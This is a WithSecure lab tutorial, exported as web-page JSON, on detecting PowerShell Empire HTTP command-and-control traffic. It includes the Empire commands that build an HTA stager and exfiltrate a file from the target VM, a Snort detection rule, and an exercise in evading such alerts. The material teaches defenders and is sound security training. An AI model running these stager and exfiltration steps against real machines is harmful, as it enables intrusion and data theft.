{"id":10546,"date":"2020-07-15T09:00:00","date_gmt":"2020-07-15T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/"},"modified":"2026-05-25T10:21:56","modified_gmt":"2026-05-25T09:21:56","slug":"attack-detection-fundamentals-c2-and-exfiltration-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/","title":{"rendered":"Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: C2 and Exfiltration &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span 
class=\"wp-component-content__meta-category\">\n                                        Data Protection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Network Security                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                15 Juli, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Teilen Sie dies                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            
<\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-300x200.jpg.webp 300w, 
https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_effd6a3f965560e90e101930b2ac0ee6\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 
31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Derek Stoeckenius<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Inhaltliche Navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select 
js-content-navigation-select\">\n                <option value=\"\">\n                    W\u00e4hlen Sie einen Abschnitt                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection 
Fundamentals: C2 and Exfiltration &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the fourth and final part of WithSecure Consulting&#x27;s Attack Detection Fundamentals Workshop series, covering Command and Control (C2) and Exfiltration, we explored a number of attacker techniques for maintaining communication with an implant, blending in with corporate network traffic.<\/p>\n<p>We also explored the detection strategies that can be employed to identify these channels using our own detection stacks, including ways to spot these channels being used for exfiltration. As with previous workshops, the following blog provides a step-by-step guide to recreating the demos from that C2 and Exfiltration workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown. A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/dHyU0Q32_v8\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In this lab we&#x27;re going to be using PowerShell Empire, a framework that was first <a href=\"https:\/\/www.youtube.com\/watch?v=Pq9t59w0mUI\" target=\"_blank\" rel=\"noopener\">introduced<\/a> in 2015. While no-longer maintained by its original creators, it remains a popular choice for some threat actors. 
For the purposes of this lab, we&#x27;re going to use a simple HTA payload (as we did in our <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-2\/\" target=\"_blank\" rel=\"noopener\">first<\/a> workshop) and observe the network traffic produced with the default traffic profile.<\/p>\n<p>For the purposes of this lab, we&#x27;re going to be producing and analysing packet captures. In a corporate context, you may carry out the same analysis with web proxy logs or, depending on your detection stack, this may be provided by endpoint telemetry (explored in our <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-c2-and-exfiltration-lab-3\/\" target=\"_blank\" rel=\"noopener\">final<\/a> lab). This lab is nice and simple and will only require an attacker VM and our target VM.<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/github.com\/fireeye\/SilkETW\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/fireeye\/SilkETW<\/a><\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/BC-SECURITY\/Empire\" target=\"_blank\" rel=\"noopener\">PowerShell Empire<\/a><\/li>\n<li><a href=\"https:\/\/www.sans.org\/reading-room\/whitepapers\/incident\/disrupting-empire-identifying-powershell-empire-command-control-activity-38315\" target=\"_blank\" rel=\"noopener\">SANS &#8211; Disrupting Empire: Identifying PowerShell Empire Command and Control Activity<\/a><\/li>\n<\/ul>\n<p>DISCLAIMER: Set up of the tools and the testing environment might not be covered comprehensively within this lab. We will assume basic familiarity with Linux\/Windows command line and the ability of the reader to deploy the necessary frameworks. 
For that, it is recommended to follow the suggested references for the official tutorials and walkthrough published by the framework&#x27;s author.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Wireshark<\/li>\n<li>PowerShell Empire<\/li>\n<li><a href=\"https:\/\/www.snort.org\/\" target=\"_blank\" rel=\"noopener\">Snort<\/a><\/li>\n<li>2x VMs (Disable AV and Firewall)<\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Launching Empire<\/h3>\n<p>Launch Empire and you should see the following screen:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Ensure a default HTTP listener is configured and active. Then, generate the HTA stager to be executed on the target machine.<\/p>\n<p>To do this, issue the following commands:<\/p>\n<pre><code class=\"language-bash\">listeners\nusestager windows\/hta\nset Listener http\nset Outfile hta_payload.hta\nexecute<\/code><\/pre>\n<p>Transfer the above generated &quot;hta_payload.hta&quot; to the target machine. We can simply double-click this payload to connect back to the attacking machine. 
A successful payload launch should look like the below.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire-foothold.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>To interact with the implant on our target machine and exfiltrate files, issue the following commands:<\/p>\n<pre><code class=\"language-bash\">agents\ninteract [name of agent for target machine]\ndownload c:\\[file to exfiltrate]<\/code><\/pre>\n<h3>2 &#8211; Detection<\/h3>\n<p>Now we can review the network traffic generated by our established C2 channel!<\/p>\n<p>Looking at the <a href=\"https:\/\/github.com\/EmpireProject\/Empire\/blob\/e37fb2eef8ff8f5a0a689f1589f424906fe13055\/data\/agent\/agent.ps1#L78\" target=\"_blank\" rel=\"noopener\">code<\/a> for the Empire agent, we can see that by default it will communicate with three URIs, namely:<\/p>\n<ul>\n<li>\/admin\/get.php<\/li>\n<li>\/news.php<\/li>\n<li>\/login\/process.php<\/li>\n<\/ul>\n<p>We can also see a default user agent:<\/p>\n<pre><code class=\"language-bash\">Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire-traffic-profile.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>If we turn our attention to the Wireshark packet capture, immediately we can see these URIs in action:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire-traffic-packet-capture.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>If we follow the TCP stream, as we&#x27;ve done previously, we can take a slightly more detailed look at the traffic. Firstly, we see our default user agent present in the headers of our request. 
We can also see encrypted data being transmitted within the body of (what would otherwise be plaintext) HTTP requests.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/encrypted-body-http.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>As well as our user agent, preset URIs and encrypted HTTP body, we can also see some indicators produced as a result of our data exfiltration.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/empire-exfil-post-requests.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>In the TCP stream above, we can see that our Empire server responds to our data exfil POST requests with a &quot;Microsoft-IIS\/7.5&quot; server header (configured <a href=\"https:\/\/github.com\/EmpireProject\/Empire\/blob\/e37fb2eef8ff8f5a0a689f1589f424906fe13055\/lib\/listeners\/http_com.py#L116\" target=\"_blank\" rel=\"noopener\">here<\/a>), and a dummy 404 page (configured <a href=\"https:\/\/github.com\/EmpireProject\/Empire\/blob\/e37fb2eef8ff8f5a0a689f1589f424906fe13055\/lib\/listeners\/http_com.py#L144\" target=\"_blank\" rel=\"noopener\">here<\/a>).<\/p>\n<p>Of course, as with many of the attacker tools we&#x27;ve used throughout these workshops, all of these settings are configurable &#8211; but nevertheless, we can alert upon the presence of these default C2 channels using Snort.<\/p>\n<p>We can use a rule like the below to achieve this:<\/p>\n<pre><code class=\"language-bash\">alert tcp any any -&gt; any any (msg: &quot;Possible Empire activity&quot; ; sid:1000001 ; content:&quot;404&quot; ; http_stat_code; content:&quot;Microsoft-IIS\/7.5&quot;; http_client_body;)<\/code><\/pre>\n<p>We can test this rule against the PCAP file that we&#x27;ve generated from our packet capture using the following command:<\/p>\n<pre><code class=\"language-bash\">snort -A console -K none -q -r empire.pcap -c 
empirec2.rule<\/code><\/pre>\n<p>If configured correctly, Snort should output any rule matches to the console, as below:<\/p>\n<pre><code class=\"language-bash\">06\/27-11:29:34.132062  [**] [1:1000001:0] Possible Empire activity [**] [Priority: 0] {TCP} 192.168.1.80:8081 -&gt; 192.168.1.83:51138\n06\/27-11:29:39.211460  [**] [1:1000001:0] Possible Empire activity [**] [Priority: 0] {TCP} 192.168.1.80:8081 -&gt; 192.168.1.83:51139\n06\/27-11:29:44.285743  [**] [1:1000001:0] Possible Empire activity [**] [Priority: 0] {TCP} 192.168.1.80:8081 -&gt; 192.168.1.83:51140<\/code><\/pre>\n<p>It&#x27;s a valuable exercise to review the default behaviours and notable strings used within these frameworks to develop similar detections. While obviously very narrowly focused, they can provide visibility of actors that have, for whatever reason, neglected to customise their tooling.<\/p>\n<p>You could take a look at the <a href=\"https:\/\/github.com\/cobbr\/Covenant\/wiki\/Listener-Profiles\" target=\"_blank\" rel=\"noopener\">traffic profiles<\/a> within Covenant, another framework we&#x27;ve used. See if you can build Snort alerts for that profile, then modify your traffic profile to evade these.<\/p>\n<h2>Conclusions<\/h2>\n<p>In the first lab of our workshop series, we covered the detection opportunities provided by an attacker using PowerShell Empire. We focused on network traffic, evaluating packet captures and the Empire code base to identify Empire&#x27;s URIs, user agent and server response behaviour. 
We also applied a Snort rule to our packet capture, demonstrating the potential for us to detect this traffic in action.<\/p>\n<p>The main takeaways from this final lab are:<\/p>\n<ul>\n<li>A demonstration of PowerShell Empire and its default traffic profile.<\/li>\n<li>Opportunities to detect HTTP C2 channels based on URIs, encrypted HTTP bodies and user agents.<\/li>\n<li>Use of Snort to produce an alert for Empire traffic based on server response behaviour.<\/li>\n<\/ul>\n<p>Now, let&#x27;s take a look at command and control over <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/\" target=\"_blank\" rel=\"noopener\">DNS<\/a>!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack 
Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. 
No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card 
wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn 
btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/darkgate-rises\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse 
  <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this lab we&#8217;re going to be using PowerShell Empire, a framework that was first introduced in 2015. While no longer maintained by its original creators, it remains a popular choice for some threat actors.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[310,368,344],"labs_content_type":[313],"class_list":["post-10546","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-data-protection","category-network-security"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Data Protection<\/span>\n                              
              <span class=\"wp-component-card-insight__category\">Network Security<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this lab we&#039;re going to be using PowerShell Empire, a framework that was first introduced in 2015. While no-longer maintained by its original creators, it remains a popular choice for some threat actors.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\">Mehr erfahren<\/a>            <\/div>\n            